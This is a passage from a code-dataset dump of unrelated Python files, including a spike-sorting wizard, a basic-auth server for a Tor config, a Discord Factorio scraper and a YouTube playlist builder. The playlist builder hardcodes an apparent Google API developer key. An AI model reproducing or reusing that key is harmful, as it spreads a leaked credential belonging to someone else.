match_list(self):\n \"\"\"Current list of closest matches, by decreasing similarity.\"\"\"\n return self._match_list\n\n @property\n def n_processed(self):\n \"\"\"Numbered of processed clusters so far.\n\n A cluster is considered processed if its group is not `None`.\n\n \"\"\"\n return len(self._in_groups(self._best_list, ('good', 'ignored')))\n\n @property\n def n_clusters(self):\n \"\"\"Total number of clusters.\"\"\"\n return len(self.cluster_ids)\n\n # Navigation\n #--------------------------------------------------------------------------\n\n @property\n def _has_finished(self):\n return self.best is not None and len(self._best_list) <= 1\n\n def next_best(self):\n \"\"\"Select the next best cluster.\"\"\"\n if self._has_finished:\n return\n self.best = _next(self._best_list,\n self._best,\n )\n if self.match is not None:\n self._set_match_list()\n\n def previous_best(self):\n \"\"\"Select the previous best in cluster.\"\"\"\n if self._has_finished:\n return\n self.best = _previous(self._best_list,\n self._best,\n )\n if self.match is not None:\n self._set_match_list()\n\n def next_match(self):\n \"\"\"Select the next match.\"\"\"\n # Handle the case where we arrive at the end of the match list.\n if self.match is not None and len(self._match_list) <= 1:\n self.next_best()\n else:\n self.match = _next(self._match_list,\n self._match,\n )\n\n def previous_match(self):\n \"\"\"Select the previous match.\"\"\"\n self.match = _previous(self._match_list,\n self._match,\n )\n\n def next(self):\n \"\"\"Next cluster proposition.\"\"\"\n if self.match is None:\n return self.next_best()\n else:\n return self.next_match()\n\n def previous(self):\n \"\"\"Previous cluster proposition.\"\"\"\n if self.match is None:\n return self.previous_best()\n else:\n return self.previous_match()\n\n def first(self):\n \"\"\"First match or first best.\"\"\"\n if self.match is None:\n self.best = self._best_list[0]\n else:\n self.match = self._match_list[0]\n\n def last(self):\n \"\"\"Last match or last best.\"\"\"\n if self.match is None:\n self.best = self._best_list[-1]\n else:\n self.match = self._match_list[-1]\n\n # Control\n #--------------------------------------------------------------------------\n\n def start(self):\n \"\"\"Start the wizard by setting the list of best clusters.\"\"\"\n self._set_best_list()\n\n def pin(self, cluster=None):\n \"\"\"Pin the current best cluster and set the list of closest matches.\"\"\"\n if self._has_finished:\n return\n if cluster is None:\n cluster = self.best\n if self.match is not None and self.best == cluster:\n return\n self.best = cluster\n self._set_match_list(cluster)\n self._check()\n\n def unpin(self):\n \"\"\"Unpin the current cluster.\"\"\"\n if self.match is not None:\n self.match = None\n self._match_list = []\n\n # Actions\n #--------------------------------------------------------------------------\n\n def _delete(self, clusters):\n for clu in clusters:\n if clu in self._cluster_groups:\n del self._cluster_groups[clu]\n if clu in self._best_list:\n self._best_list.remove(clu)\n if clu in self._match_list:\n self._match_list.remove(clu)\n if clu == self._best:\n self._best = self._best_list[0] if self._best_list else None\n if clu == self._match:\n self._match = None\n\n def _add(self, clusters, group, position=None):\n for clu in clusters:\n assert clu not in self._cluster_groups\n assert clu not in self._best_list\n assert clu not in self._match_list\n self._cluster_groups[clu] = group\n if self.best is not None:\n if position is not None:\n self._best_list.insert(position, clu)\n else:\n self._best_list.append(clu)\n if self.match is not None:\n self._match_list.append(clu)\n\n def _update_state(self, up):\n # Update the cluster group.\n if up.description == 'metadata_group':\n cluster = up.metadata_changed[0]\n group = up.metadata_value\n self._cluster_groups[cluster] = group\n # Reorder the best list, so that the clusters moved in different\n # groups go to their right place in the best list.\n if self._best is not None and self._best_list:\n # Find the next best after the cluster has been moved.\n next_best = _next(self._best_list, self._best)\n # Reorder the list.\n self._best_list = self._sort(self._best_list)\n # Select the next best.\n self._best = next_best\n # Update the wizard with new and old clusters.\n for clu in up.added:\n # Add the child at the parent's position.\n parents = [x for (x, y) in up.descendants if y == clu]\n parent = parents[0]\n group = self._group(parent)\n position = (self._best_list.index(parent)\n if self._best_list else None)\n self._add([clu], group, position)\n # Delete old clusters.\n self._delete(up.deleted)\n # Select the last added cluster.\n if self.best is not None and up.added:\n self.best = up.added[-1]\n\n def on_cluster(self, up):\n if self._has_finished:\n return\n if self._best_list or self._match_list:\n self._update_state(up)\n\n # Panel\n #--------------------------------------------------------------------------\n\n @property\n def _best_progress(self):\n \"\"\"Progress in the best clusters.\"\"\"\n value = (self.best_list.index(self.best)\n if self.best in self.best_list else 0)\n maximum = len(self.best_list)\n return _progress(value, maximum)\n\n @property\n def _match_progress(self):\n \"\"\"Progress in the processed clusters.\"\"\"\n value = self.n_processed\n maximum = self.n_clusters\n return _progress(value, maximum)\n\n def get_panel_params(self):\n \"\"\"Return the parameters for the HTML panel.\"\"\"\n return dict(best=self.best if self.best is not None else '',\n match=self.match if self.match is not None else '',\n best_progress=self._best_progress,\n match_progress=self._match_progress,\n best_group=self._group(self.best) or 'unsorted',\n match_group=self._group(self.match) or 'unsorted',\n )\n\n\n#------------------------------------------------------------------------------\n# Wizard view model\n#------------------------------------------------------------------------------\n\nclass WizardViewModel(HTMLClusterViewModel):\n def get_html(self, **kwargs):\n static_path = op.join(op.dirname(op.realpath(__file__)), 'static')\n params = self._wizard.get_panel_params()\n html = _read('wizard.html', static_path=static_path)\n return html.format(**params)\n\n def get_css(self, **kwargs):\n css = super(WizardViewModel, self).get_css(**kwargs)\n static_path = op.join(op.dirname(op.realpath(__file__)), 'static')\n css += _read('styles.css', static_path=static_path)\n return css\n","sub_path":"phy/cluster/manual/wizard.py","file_name":"wizard.py","file_ext":"py","file_size_in_byte":16481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"379361972","text":"\nclass Result:\n def __init__(self, coin, type, time_frame, score, beg, end):\n self.coin = coin\n self.type = type\n self.time_frame = time_frame\n self.score = score\n self.beg = beg #candles away from present\n self.end = end #cadles away from present\n\n def __str__(self):\n return \"Pairing: {} | Time Frame: {} | Type Divergence: {} | Score: {} | When: {} to {} periods ago\".format(self.coin, self.time_frame, self.type, self.score, self.beg, self.end)\n","sub_path":"Result.py","file_name":"Result.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"72159325","text":"from common.http_interface import *\n\nheaders = None\nclass Services:\n\n def get_connected(self):\n try:\n url = \"https://reqres.in/api/users?page=1\"\n response = get_resource(url, headers)\n # print(response)\n return response\n except Exception as e:\n print(\"unable to get connected through url {}\".format(e))\n\n def get_all_following(self):\n try:\n url = \"https://reqres.in/api/users?page=2\"\n response = get_resource(url, headers)\n return response\n Logger.log_info(\"getting all the list of employees\")\n except Exception as e:\n Logger.log_error(\"unable to get the employees {}\".format(str(e)))\n\n def create_data(self,value):\n try:\n value = value\n data = json.dumps(value).encode('utf-8')\n url = 'https://reqres.in/api/users'\n response = create_resource(url=url, headers=headers, data=data)\n Logger.log_info(response.status_code)\n # data = json.dumps(value).encode('utf-8')\n if response.status_code == 201:\n resp = json.dumps(response.json())\n Logger.log_info(\"posting,updating some information succesfully \")\n\n return resp\n except Exception as e:\n Logger.log_error(\"unable to get the response {}\".format(str(e)))\n\ns = Services()\nprint(s.get_all_following())\nprint(s.get_connected())\nprint(s.create_data(value={\"name\": \"gopi\", \"job\": \"Automation tester\"}))","sub_path":"RestAPIFramework/source/uber/uber_service.py","file_name":"uber_service.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"392953918","text":"import tkinter.messagebox\n\ndef addUp(l):\n res = 0\n for each in l:\n res = res + each\n return res\n\nl = [['1,20,', '', '', '9', ''], ['21', '', '', '8', ''], ['21', '', '', '21', '']]\nl2 = [[21, 21, 21, 9, 12], [21, 21, 21, 8, 13], [21, 21, 21, 21, 0]]\nlFinal = l2\n# validate inputs:\n# '1,21,'-A-['1','21','']-B-['1','21']-C-[1,21]\n# '1,21'-A-['1','21']-C-[1,21]\n# '' --copy from l2(also int)(check)\n# '21' -C?-21\nprint(l)\nfor i in range(len(l)): # 0 1 2\n for j in range(len(l[i])): # 0 1 2 3 4 \n if l[i][j] == '':\n l[i][j] =l2[i][j] # '' --copy from l2(also int)\n elif l[i][j].isdigit(): # '21' -C?-21\n l[i][j] = int(l[i][j])\n else:\n commaSplit = True\n l_tmp = l[i][j].split(',')# return list of seperated \n if '' in l_tmp:\n l_tmp.remove('')\n print('after remove space',l_tmp)\n for each in l_tmp:\n commaSplit = commaSplit&each.isdigit()\n print(commaSplit)\n if commaSplit ==True:\n l_tmp = [int(each) for each in l_tmp]\n if addUp(l_tmp) == l2[i][j]:\n pass\n else:\n tkinter.messagebox.showinfo('Math ERROR','%d row %d column\\n added up value does not match with given frequency'% (i,j))\n else:\n tkinter.messagebox.showinfo('INPUT ERROR','please validate %d row %d column!!!\\nOnly digits and , or space are allowed'% (i,j))\n \nprint(l)\nprint(l2)\n\n \n\n","sub_path":"testcode/listTest.py","file_name":"listTest.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"229408305","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nimport re\n\n\n# This is the json config data that gets sent to authorized users\nTOR_CONFIG_JSON_STRING = None\nTOR_CONFIG_JSON_FILENAME = 'torconfig.json'\n\n\nAUTH_FILENAME = 'auth_credentials.dat'\n# Auth credentials are base64 encdoded strings that get loaded from the\n# auth_credentials.dat file.\n# The strings are user:password encoded in base64\nAUTH_CREDENTIALS = []\n\n# Regex used to check if a string is indeed base64\nBASE64_REGEX_VALIDATOR = r'^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)$'\nBASE64_REGEX_VALIDATOR = re.compile(BASE64_REGEX_VALIDATOR)\n\n\nclass TorAuthServer(BaseHTTPRequestHandler):\n def send_auth_request(self):\n print('Unathorized user request, sending WWW-Authenticate headers')\n self.send_response(401)\n self.send_header('WWW-Authenticate', 'Basic realm=\\\"Tor auth\\\"')\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def send_tor_config_data(self):\n self.send_header(\"Content-type\", \"application/json\")\n self.end_headers()\n self.wfile.write(TOR_CONFIG_JSON_STRING.encode())\n\n def do_GET(self):\n auth_header = self.headers.get('Authorization')\n if auth_header is None:\n # User is not logged in and must post with basic auth headers\n self.send_auth_request()\n self.wfile.write(b'Please enter your username and password')\n elif auth_header.startswith('Basic '):\n auth_token = auth_header.split(' ')[1]\n print(auth_token)\n if auth_token in AUTH_CREDENTIALS:\n print('Authenticated user connected, sending TOR config')\n self.send_response(200)\n self.send_tor_config_data()\n else:\n self.send_auth_request()\n self.wfile.write(b'Invalid auth credentials, try again')\n else:\n self.send_auth_request()\n self.wfile.write(b'Invalid auth credentials, try again')\n\n\ndef is_valid_base64(content):\n return BASE64_REGEX_VALIDATOR.match(content) is not None\n\n\ndef read_auth_file():\n with open(AUTH_FILENAME, 'r') as f:\n for line in f.readlines():\n if line:\n line = line.strip()\n if is_valid_base64(line):\n AUTH_CREDENTIALS.append(line)\n else:\n print(f'auth credential {line} ignored, must be valid base64')\n\n\ndef read_tor_config_json_file():\n global TOR_CONFIG_JSON_STRING\n with open(TOR_CONFIG_JSON_FILENAME, 'r') as f:\n TOR_CONFIG_JSON_STRING = f.read()\n\n\ndef run():\n print('Starting TOR Auth server')\n\n read_auth_file()\n read_tor_config_json_file()\n\n server_address = ('127.0.0.1', 8080)\n httpd = HTTPServer(server_address, TorAuthServer)\n\n message = 'Server is running on {}:{}' \\\n .format(server_address[0], server_address[1])\n\n print(message)\n\n httpd.serve_forever()\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"tor_auth_server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"613831139","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('team/', views.team, name='team'),\n path('match/', views.match, name='match'),\n path('player/', views.player, name='player'),\n path('recharge', views.recharge, name='recharge'),\n path('account', views.account, name='account'),\n path('login', views.login_view, name='login'),\n path('logout', views.logout_view, name='logout'),\n path('register', views.register, name='register'),\n path('about', views.about, name='about'),\n path('terms', views.terms, name='terms'),\n path('privacy', views.privacy, name='privacy'),\n path('live', views.live, name='live'),\n path('history', views.history, name='history'),\n path('pool', views.pool, name='pool'),\n path('dev', views.dev, name='dev')\n]\n","sub_path":"thon/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"76806337","text":"# ======================================================================\n# imports\n# ======================================================================\nimport aiohttp\nimport bs4\nimport tomd\nimport re\n\nimport discord\nfrom discord.ext import commands as cmds\n\n\n# ======================================================================\ndef mod_embed(result):\n taglist = []\n fields = []\n title = result.find(\"div\", class_=\"mod-card-info-container\").find(\"h2\", class_=\"mod-card-title\").find(\"a\")\n em = discord.Embed(title=title.get_text(),\n url=f\"https://mods.factorio.com{title['href'].replace(' ', '%20')}\",\n description=result.find(\"div\", class_=\"mod-card-info-container\")\n .find(\"div\", class_=\"mod-card-summary\").get_text(),\n colour=0x19B300)\n thumbnail = result.find(\"div\", class_=\"mod-card-thumbnail\")\n if \"no-picture\" not in thumbnail.attrs[\"class\"]:\n em.set_thumbnail(url=thumbnail.find(\"a\").find(\"img\")[\"src\"])\n owner = result.find(\"div\", class_=\"mod-card-info-container\").find(\"div\", class_=\"mod-card-author\").find(\"a\")\n fields.append({\"name\": \"Owner\", \"value\": f\"[{owner.get_text()}]({owner['href']})\"})\n for tag in result.find(\"div\", class_=\"mod-card-footer\").find(\"ul\").find_all(\"li\", class_=\"tag\"):\n tag = tag.find(\"span\").find(\"a\")\n taglist.append(f\"[{tag.get_text()}]({tag['href']})\")\n game_versions = result.find(\"div\", class_=\"mod-card-info\") \\\n .find(\"span\", title=\"Available for these Factorio versions\")\n downloads = result.find(\"div\", class_=\"mod-card-info\").find(\"span\", title=\"Downloads\")\n created_at = result.find(\"div\", class_=\"mod-card-info\").find(\"span\", title=\"Last updated\")\n fields.extend([{\"name\": \"Tags\", \"value\": ', '.join(taglist)},\n {\"name\": \"Game Version(s)\", \"value\":\n game_versions.find(\"div\", class_=\"mod-card-info-tag-label\").get_text()},\n {\"name\": \"Downloads\", \"value\": downloads.find(\"div\", class_=\"mod-card-info-tag-label\").get_text()},\n {\"name\": \"Updated\", \"value\": created_at.find(\"div\", class_=\"mod-card-info-tag-label\").get_text()}])\n for field in fields:\n em.add_field(**field, inline=True)\n # em.set_footer(text=bot.user.name,\n # icon_url=f\"https://cdn.discordapp.com/avatars/{bot.user.id}/{bot.user.avatar}.png?size=64\")\n return em\n\n\nclass Factorio:\n def __init__(self, bot):\n self.bot = bot\n type(self).__name__ = \"Factorio Commands\"\n\n @cmds.command(name=\"linkmod\", aliases=[\"mod\"])\n async def link_mod(self, ctx, *, modname):\n \"\"\"\n Search for a mod in [mods.factorio.com](https://mods.factorio.com).\n \"\"\"\n em = discord.Embed(title=f\"Searching for \\\"{modname.title()}\\\" in mods.factorio.com...\",\n description=\"This may take a bit.\",\n colour=0xDFDE6E)\n # em.set_footer(text=self.bot.user.name,\n # icon_url=f\"https://cdn.discordapp.com/avatars/{self.bot.user.id}/\n # {self.bot.user.avatar}.png?size=64\")\n buffer_msg = await ctx.send(embed=em)\n async with ctx.channel.typing():\n try:\n async with aiohttp.ClientSession() as session:\n modname = modname.title()\n async with session.get(f\"https://mods.factorio.com/query/{modname}\") as response:\n soup = bs4.BeautifulSoup(await response.text(), 'html.parser')\n\n if \" 0 \" in soup.find('span', class_='active-filters-bar-total-mods').get_text():\n em = discord.Embed(title=\"Error\",\n description=f\"Could not find \\\"{modname.title()}\\\" in mod portal.\",\n colour=0xDC143C)\n await buffer_msg.edit(embed=em)\n return\n\n if soup.find_all('div', class_=\"mod-card\"):\n if len(soup.find_all('div', class_=\"mod-card\")) > 1:\n em = discord.Embed(title=f\"Search results for \\\"{modname}\\\"\",\n colour=0xDFDE6E)\n i = 0\n for result in soup.find_all('div', class_=\"mod-card\"):\n if i <= 4:\n title = result.find(\"h2\", class_=\"mod-card-title\").find(\"a\")\n if title.get_text().title() == modname.title():\n em = mod_embed(result)\n break\n em.add_field(name=title.get_text(),\n value=f\"{result.find('div', class_='mod-card-summary').get_text()}\"\n f\" [_Read More_](https://mods.factorio.com/mods{title['href']})\")\n i += 1\n\n else:\n em = mod_embed(soup.find(\"div\", class_=\"mod-card\"))\n\n await buffer_msg.edit(embed=em)\n return\n\n except (aiohttp.client_exceptions.ContentTypeError, KeyError):\n em = discord.Embed(title=\"Error\",\n description=\"Couldn't reach mods.factorio.com.\",\n colour=0xDC143C)\n buffer_msg.edit(embed=em)\n\n @cmds.command(name=\"wiki\")\n async def wiki(self, ctx, *, searchterm):\n \"\"\"\n Searches for a term in the [official Factorio wiki](https://wiki.factorio.com/).\n \"\"\"\n em = discord.Embed(title=f\"Searching for \\\"{searchterm.title()}\\\" in wiki.factorio.com...\",\n description=\"This shouldn't take long.\",\n colour=0xDFDE6E)\n # em.set_footer(text=self.bot.user.name,\n # icon_url=f\"https://cdn.discordapp.com/avatars/{self.bot.user.id}/\n # {self.bot.user.avatar}.png?size=64\")\n buffer_msg = await ctx.send(embed=em)\n async with ctx.channel.typing():\n async with aiohttp.ClientSession() as client:\n async with client.get(\n f\"https://wiki.factorio.com/index.php?search={searchterm.replace(' ', '%20')}\") as resp:\n r = await resp.text()\n url = str(resp.url)\n soup = bs4.BeautifulSoup(r, 'html.parser')\n if soup.find('p', class_='mw-search-nonefound'):\n em = discord.Embed(title=\"Error\",\n description=f\"Could not find \\\"{searchterm.title()}\\\" in wiki.\",\n colour=0xDC143C)\n # em.set_footer(text=self.bot.user.name,\n # icon_url=f\"https://cdn.discordapp.com/avatars/{self.bot.user.id}/\n # {self.bot.user.avatar}.png?size=64\")\n await buffer_msg.edit(embed=em)\n return\n if soup.find_all('ul', class_=\"mw-search-results\"):\n em = discord.Embed(title=\"Factorio Wiki\",\n url=url,\n colour=0xDFDE6E)\n for item in soup.find_all('ul', class_=\"mw-search-results\")[0].find_all(\"li\"):\n item = item.find_next('div', class_=\"mw-search-result-heading\").find('a')\n itemlink = item['href'] if not item['href'].endswith(\")\") else item['href'].replace(\")\", \"\\)\")\n em.add_field(name=item['title'],\n value=f\"[Read More](https://wiki.factorio.com{itemlink})\",\n inline=True)\n # em.set_footer(text=self.bot.user.name,\n # icon_url=f\"https://cdn.discordapp.com/avatars/{self.bot.user.id}/\n # {self.bot.user.avatar}.png?size=64\")\n await buffer_msg.edit(embed=em)\n else:\n description_ = \"\"\n if soup.select(\"#mw-content-text > p\"):\n p_num = 0\n if re.search(r\"((^
$)|(This (article|page)))\", str(soup.select(\"#mw-content-text > p\")[0])):\n p_num = 1\n description_ = tomd.convert(str(soup.select(\"#mw-content-text > p\")[p_num])) \\\n .strip().replace(\"
\", \"\\n\")\n em = discord.Embed(title=soup.find(\"h1\", id='firstHeading').get_text(),\n description=re.sub(r\"\\((\\/\\S*)\\)\", r\"(https://wiki.factorio.com\\1)\", description_),\n url=url,\n colour=0x19B300)\n if soup.find('div', class_=\"factorio-icon\"):\n em.set_thumbnail(\n url=f\"https://wiki.factorio.com{soup.find('div', class_='factorio-icon').find('img')['src']}\")\n # em.set_footer(text=self.bot.user.name,\n # icon_url=f\"https://cdn.discordapp.com/avatars/{self.bot.user.id}/\n # {self.bot.user.avatar}.png?size=64\")\n await buffer_msg.edit(embed=em)\n\n\n# ======================================================================\ndef setup(bot):\n bot.add_cog(Factorio(bot))\n","sub_path":"cogs/factorio.py","file_name":"factorio.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"228625385","text":"import argparse\nimport sys\nimport time\n\nimport httplib2\nfrom PyQt4 import QtCore\nfrom apiclient import discovery\nfrom oauth2client import tools\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.file import Storage\nfrom oauth2client.tools import argparser, run_flow\n\n\nclass ChangeMyBarEvent:\n def __init__(self, value):\n self.value = value\n\n\nclass ChangeMyListEvent:\n def __init__(self, nombre, artista, album):\n self.nombre = nombre\n self.artista = artista\n self.album = album\n\n\nclass CreadorDePlay(QtCore.QThread):\n trigger = QtCore.pyqtSignal(ChangeMyBarEvent)\n trigger2 = QtCore.pyqtSignal(ChangeMyListEvent)\n CLIENT_SECRETS_FILE = \"client_secrets.json\"\n YOUTUBE_SCOPE = \"https://www.googleapis.com/auth/youtube\"\n YOUTUBE_READ_WRITE_SSL_SCOPE = \"https://www.googleapis.com/auth/youtube.force-ssl\"\n\n def __init__(self, parent, play, developer_key=\"AIzaSyDsKS548hXYlTve-WETqBRIsPqc3OBHTdo\",\n YOUTUBE_API_SERVICE_NAME=\"youtube\", YOUTUBE_API_VERSION=\"v3\"):\n super().__init__()\n self.parent = parent\n self.play = play\n self.DEVELOPER_KEY = developer_key\n self.YOUTUBE_API_SERVICE_NAME = YOUTUBE_API_SERVICE_NAME\n self.YOUTUBE_API_VERSION = YOUTUBE_API_VERSION\n self.trigger.connect(parent.set_value_bar)\n self.trigger2.connect(parent.cambiar_lists)\n self.diccionario = {self.play: []}\n self.youtube = self.get_authenticated_service()\n\n def crear_playlist(self):\n nombre = self.play\n CLIENT_SECRETS_FILE = \"client_secrets.json\"\n\n MISSING_CLIENT_SECRETS_MESSAGE = \"\"\"\n WARNING: Please configure OAuth 2.0\"\"\"\n\n # This OAuth 2.0 access scope allows for full read/write access to the\n # authenticated user's account.\n YOUTUBE_READ_WRITE_SCOPE = \"https://www.googleapis.com/auth/youtube\"\n YOUTUBE_API_SERVICE_NAME = \"youtube\"\n YOUTUBE_API_VERSION = \"v3\"\n\n flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,\n message=MISSING_CLIENT_SECRETS_MESSAGE,\n scope=YOUTUBE_READ_WRITE_SCOPE)\n\n storage = Storage(\"%s-oauth2.json\" % sys.argv[0])\n credentials = storage.get()\n\n if credentials is None or credentials.invalid:\n flags = argparser.parse_args()\n credentials = run_flow(flow, storage, flags)\n\n youtube = discovery.build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,\n http=credentials.authorize(httplib2.Http()))\n\n playlists_insert_response = youtube.playlists().insert(\n part=\"snippet,status\",\n body=dict(\n snippet=dict(\n title=nombre,\n description=\"Lista {} copiada desde spotify :)\".format(nombre)\n ),\n status=dict(\n privacyStatus=\"private\"\n )\n )\n ).execute()\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"id\"] = playlists_insert_response[\"id\"]\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"canciones\"] = []\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"max_coments\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"min_coments\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"max_likes\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"min_likes\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"max_dislikes\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"min_dislikes\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"max_views\"] = {}\n self.parent.playlists_creadas[self.DEVELOPER_KEY][nombre][\"min_views\"] = {}\n\n def youtube_search(self, options):\n youtube = discovery.build(self.YOUTUBE_API_SERVICE_NAME, self.YOUTUBE_API_VERSION,\n developerKey=self.DEVELOPER_KEY)\n\n # Call the search.list method to retrieve results matching the specified\n # query term.\n search_response = youtube.search().list(\n q=options.q,\n part=\"id,snippet\",\n maxResults=options.max_results\n ).execute()\n\n videosid = None\n # Add each result to the appropriate list, and then display the lists of\n # matching videos, channels, and playlists.\n for search_result in search_response.get(\"items\", []):\n\n if search_result[\"id\"][\"kind\"] == \"youtube#video\":\n videosid = search_result[\"id\"][\"videoId\"]\n videosname = search_result[\"snippet\"][\"title\"]\n break\n\n return videosid, videosname\n\n def search(self, busqueda):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--q\", help=\"Search term\", default=busqueda)\n parser.add_argument(\"--max-results\", help=\"Max results\", default=5)\n args = parser.parse_args()\n id, video = self.youtube_search(args)\n return id, video\n\n def get_authenticated_service(self):\n flow = flow_from_clientsecrets(self.CLIENT_SECRETS_FILE, scope=self.YOUTUBE_SCOPE,\n message=\"Error, revisa tus credenciales\")\n\n storage = Storage(\"%s-oauth2.json\" % sys.argv[0])\n credentials = storage.get()\n\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage)\n\n return discovery.build(self.YOUTUBE_API_SERVICE_NAME, self.YOUTUBE_API_VERSION,\n http=credentials.authorize(httplib2.Http()))\n\n def add_video_to_playlist(self, youtube, videoID, playlistID):\n add_video_request = youtube.playlistItems().insert(\n part=\"snippet\",\n body={\n 'snippet': {\n 'playlistId': playlistID,\n 'resourceId': {\n 'kind': 'youtube#video',\n 'videoId': videoID\n }\n # 'position': 0\n }\n }\n ).execute()\n\n def get_video_statistics(self, video_id):\n youtube = self.youtube\n results = youtube.videos().list(\n id=video_id,\n part=\"statistics\"\n ).execute()\n\n return results[\"items\"][0][\"statistics\"]\n\n def run(self):\n valor = 1\n for cancion in self.parent.playlists[\"playlists\"][self.play][\"tracks\"]:\n time.sleep(0.2)\n id, titulo = self.search(cancion[\"name\"] + \" \" + \" \".join(cancion[\"artists\"]))\n diccionario = {\"nombre\": cancion[\"name\"],\n \"artistas\": \" \".join(cancion[\"artists\"]),\n \"id\": id,\n \"title\": titulo,\n \"link\": \"https://www.youtube.com/watch?v=\" + id,\n \"album\": cancion[\"album\"]}\n\n self.trigger.emit(ChangeMyBarEvent(valor))\n self.trigger2.emit(ChangeMyListEvent(cancion[\"name\"], \" \".join(cancion[\"artists\"]), cancion[\"album\"]))\n diccionario[\"statistics\"] = self.get_video_statistics(id)\n self.parent.playlists_creadas[self.parent.api][self.play][\"canciones\"].append(diccionario)\n self.add_video_to_playlist(self.youtube, diccionario[\"id\"], self.parent.playlists_creadas[self.parent.api][self.play][\"id\"])\n print(valor, self.parent.playlists_creadas[self.parent.api])\n valor += 1\n self.parent.playlists_creadas[self.parent.api][self.play][\"ready\"] = True\n\n max_coments = 0\n min_coments = float(\"inf\")\n max_likes = 0\n min_likes = float(\"inf\")\n max_dislikes = 0\n min_dislikes = float(\"inf\")\n max_views = 0\n min_views = float(\"inf\")\n for cancion in self.parent.playlists_creadas[self.parent.api][self.play][\"canciones\"]:\n if \"commentCount\" in cancion[\"statistics\"]:\n coments = int(cancion[\"statistics\"][\"commentCount\"])\n elif \"commentCount\" not in cancion[\"statistics\"]:\n coments = None\n if \"likeCount\" in cancion[\"statistics\"]:\n likes = int(cancion[\"statistics\"][\"likeCount\"])\n elif \"likeCount\" not in cancion[\"statistics\"]:\n likes = None\n if \"viewCount\" in cancion[\"statistics\"]:\n views = int(cancion[\"statistics\"][\"viewCount\"])\n elif \"viewCount\" not in cancion[\"statistics\"]:\n views = None\n if \"dislikeCount\" in cancion[\"statistics\"]:\n dislikes = int(cancion[\"statistics\"][\"dislikeCount\"])\n elif \"dislikeCount\" not in cancion[\"statistics\"]:\n dislikes = None\n if coments is not None:\n if coments > max_coments:\n max_coments = coments\n self.parent.playlists_creadas[self.parent.api][self.play][\"max_coments\"] = cancion\n\n if coments < min_coments:\n min_coments = coments\n self.parent.playlists_creadas[self.parent.api][self.play][\"min_coments\"] = cancion\n if likes is not None:\n if likes > max_likes:\n max_likes = likes\n self.parent.playlists_creadas[self.parent.api][self.play][\"max_likes\"] = cancion\n\n if likes < min_likes:\n min_likes = likes\n self.parent.playlists_creadas[self.parent.api][self.play][\"min_likes\"] = cancion\n if views is not None:\n if views > max_views:\n max_views = views\n self.parent.playlists_creadas[self.parent.api][self.play][\"max_views\"] = cancion\n\n if views < min_views:\n min_views = views\n self.parent.playlists_creadas[self.parent.api][self.play][\"min_views\"] = cancion\n if dislikes is not None:\n if dislikes > max_dislikes:\n max_dislikes = dislikes\n self.parent.playlists_creadas[self.parent.api][self.play][\"max_dislikes\"] = cancion\n\n if dislikes < min_dislikes:\n min_dislikes = dislikes\n self.parent.playlists_creadas[self.parent.api][self.play][\"min_dislikes\"] = cancion\n print(self.parent.playlists_creadas[self.parent.api])\n self.parent.block = False\n","sub_path":"back.py","file_name":"back.py","file_ext":"py","file_size_in_byte":10653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522809560","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# posiciones.py\n# \n\nimport csv \n\nfichero = open(\"otro_archivo.txt\", \"w\") #Crea y sobreescribe un archivo.txt\n\nfichero.write(\"1234567890 que cosas pondría\")\n\nfichero.seek(17)\n\nfichero.write(\"XD\")\n\n\n\nfichero.close()\n","sub_path":"jueves/posiciones.py","file_name":"posiciones.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"77031181","text":"#!/usr/bin/env python3\n\nimport sys\nfrom xml.dom import minidom\nfrom symtable import SymTable\nfrom instruction import Instruction\nfrom arg import Arg\nfrom labels import Labels\nfrom error import *\nimport argparse\n \ndef print_stats_to_file(file, cnt_insts, cnt_vars):\n \"\"\" Used by STATI extension, writes statistics to an output file \"\"\"\n\n for arg in sys.argv:\n if arg == \"--insts\":\n file.write(str(cnt_insts) + \"\\n\")\n elif arg == \"--vars\":\n file.write(str(cnt_vars) + \"\\n\")\n\n\n### Argument parsing ###\nif (\"--help\" in sys.argv or 